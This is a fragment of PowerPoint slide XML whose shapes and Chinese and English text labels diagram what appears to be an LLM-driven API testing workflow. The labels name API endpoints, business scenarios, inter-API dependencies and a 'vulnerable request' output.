            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>/login</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="64" name="图片 63"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="2820000" flipH="1">
              <a:off x="15111" y="2740"/>
              <a:ext cx="850" cy="723"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="圆角矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16110" y="3544"/>
              <a:ext cx="1231" cy="455"/>
            </a:xfrm>
            <a:prstGeom prst="round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68" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16110" y="3573"/>
              <a:ext cx="1352" cy="429"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>/user/add</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="圆角矩形 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16110" y="4111"/>
              <a:ext cx="1437" cy="455"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx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70" name="文本框 69"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16110" y="4142"/>
              <a:ext cx="1563" cy="429"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>/file/upload</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="文本框 70"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16041" y="4396"/>
              <a:ext cx="1751" cy="573"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="文本框 71"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16072" y="5031"/>
              <a:ext cx="1498" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>库</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pic>
          <p:nvPicPr>
            <p:cNvPr id="58" name="图片 57"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10508" y="6267"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="文本框 59"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10304" y="7188"/>
              <a:ext cx="1352" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>业务场景</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="文本框 75"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8813" y="7852"/>
              <a:ext cx="5492" cy="1033"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="171450" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>用户管理</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>：Login -&gt; userList</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pPr marL="171450" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>文件上传</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>：Login -&gt; fileUpload</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a:p>
              <a:pPr marL="171450" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>用户添加</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>：Login -&gt; userList -&gt; userAdd</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p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="81" name="图片 80"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14668" y="6207"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="82" name="图片 81"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="16566" y="5564"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="文本框 82"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14437" y="7138"/>
              <a:ext cx="1498" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>间依赖</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pic>
          <p:nvPicPr>
            <p:cNvPr id="84" name="图片 83"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="16450" y="6245"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="87" name="图片 86"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="15773" y="6408"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="90" name="图片 89"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6723" y="5122"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="线形标注 1(带强调线) 90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14779" y="909"/>
              <a:ext cx="2914" cy="1111"/>
            </a:xfrm>
            <a:prstGeom prst="accentCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 81917"/>
                <a:gd name="adj2" fmla="val -7827"/>
                <a:gd name="adj3" fmla="val 98531"/>
                <a:gd name="adj4" fmla="val -15477"/>
              </a:avLst>
            </a:prstGeom>
            <a:no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92" name="文本框 91"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14603" y="792"/>
              <a:ext cx="1498" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>路径</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sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="文本框 92"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14604" y="1207"/>
              <a:ext cx="1498" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>参数</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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="文本框 93"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14605" y="1638"/>
              <a:ext cx="1498" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>描述</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sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="左大括号 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="14181" y="5908"/>
              <a:ext cx="124" cy="1537"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 62700"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="19050"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="96" name="图片 95"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="11759" y="6330"/>
              <a:ext cx="850" cy="723"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="文本框 96"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12807" y="5773"/>
              <a:ext cx="1498"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数据依赖</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="文本框 97"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12807" y="6408"/>
              <a:ext cx="1498"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控制依赖</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="99" name="文本框 98"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12807" y="7043"/>
              <a:ext cx="1498"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隐式依赖</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101" name="图片 100"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8522" y="6207"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="文本框 101"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8162" y="7117"/>
              <a:ext cx="1750" cy="414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>LLM</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p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="103" name="图片 102"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="9542" y="6408"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="104" name="图片 103"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="12720000">
              <a:off x="7870" y="5831"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="文本框 105"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6567" y="5989"/>
              <a:ext cx="1306" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>脆弱请求</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
